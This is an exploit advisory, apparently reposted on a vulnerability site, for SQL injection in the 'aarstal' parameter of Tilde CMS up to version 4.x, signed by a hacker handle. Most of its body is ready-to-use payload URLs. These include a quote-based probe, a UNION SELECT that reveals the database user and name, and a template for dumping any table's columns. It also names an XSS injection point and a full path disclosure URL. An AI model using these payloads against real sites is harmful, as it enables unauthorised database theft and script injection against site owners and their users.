Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection

2007.11.29
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

--------------------------------------------------------------- ____ __________ __ ____ __ /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __ | | | \ | |/ \ \___| | /_____/ | || | |___|___| /\__| /______ /\___ >__| |___||__| \/\______| \/ \/ --------------------------------------------------------------- Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org --------------------------------------------------------------- Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection --------------------------------------------------------------- #By KiNgOfThEwOrLd --------------------------------------------------------------- PoC D'u need an explanation?!? i don't think so :P --------------------------------------------------------------- SQL Injection http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetai l&aarstal=%27 Little examples Using user() and database() functions u can get some informations about the database...as: http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetai l&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/* Or u can get some recordes by the database like: http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetai l&aarstal=999/**/union/**/select/**/1,2,[row_name],4,[row_name]/**/from/ **/[table_name]/* D'u want the tables n' the rows? Find it yourself ;P --------------------------------------------------------------- something else.. Xss Vulnerability http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetai l&aarstal=[XSS] --------------------------------------------------------------- Full Path Disclosure http://[target]/[tilde_path]/index.php?search=%3C&mode=search&sider=on&t ss=on&linier=on ---------------------------------------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top